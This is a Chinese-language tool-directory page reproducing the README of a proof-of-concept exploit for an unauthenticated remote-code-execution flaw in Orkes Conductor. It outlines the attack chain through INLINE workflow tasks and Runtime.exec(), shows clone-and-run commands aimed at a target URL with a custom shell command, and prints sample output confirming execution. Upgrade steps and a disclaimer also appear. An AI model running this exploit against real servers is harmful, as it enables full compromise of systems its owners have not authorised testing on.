Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor(3.21.21..<3.30.2)通过 INLINE GraalVM 求值器的未认证 RCE | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor(3.21.21..<3.30.2)通过 INLINE GraalVM 求值器的未认证 RCE

查看仓库
29天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) 未认证远程代码执行

Orkes Conductor

Orkes Conductor 中的严重远程代码执行漏洞

CVE Exploit Python


📋 概述

CVE-2026-58138 是一个影响 Orkes Conductor 版本 3.21.21 至 3.30.1 的严重未认证远程代码执行 (RCE) 漏洞。该漏洞允许攻击者在无需任何认证的情况下在 Conductor 服务器上执行任意命令,可能导致系统完全沦陷。

🔴 严重性

  • CVSS 分数:9.8(严重)
  • 攻击向量:网络
  • 认证要求:无需认证
  • 影响:系统完全沦陷

⚙️ 漏洞详情

该漏洞存在于 Orkes Conductor 工作流引擎中的 INLINE 任务 类型中。INLINE 任务支持 JavaScript 求值,并可通过 eval 访问 Java 对象,从而允许攻击者:

  1. 注册一个包含带 JavaScript 代码的 INLINE 任务的恶意工作流
  2. 通过 JavaScript 的 Java 互操作执行任意 Java 代码
  3. 通过 java.lang.Runtime.exec() 在 Conductor 服务器上运行系统命令

📦 受影响版本

版本范围状态
3.21.21 - 3.30.1✅ 受影响
> 3.30.1❌ 已修复

🚀 安装

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# Make the script executable
chmod +x CVE-2026-58138.py

# Verify installation
python3 CVE-2026-58138.py --help

💻 用法

root@kitploit:~
# Basic usage
python3 CVE-2026-58138.py http://target:8080

# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 示例输出

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ 缓解措施

  1. 升级到 Orkes Conductor 3.30.2 或更高版本
  2. 如非必要,禁用 INLINE 任务类型
  3. 限制对 Conductor API 的网络访问

⚠️ 免责声明

仅用于教育和安全研究目的。 仅可在您拥有或已获得明确测试许可的系统上使用。


📚 参考资料

  • NVD - CVE-2026-58138
  • Orkes Conductor 安全

⭐ 觉得有用?在 GitHub 上给个星标吧 ⭐

GitHub stars

下载工具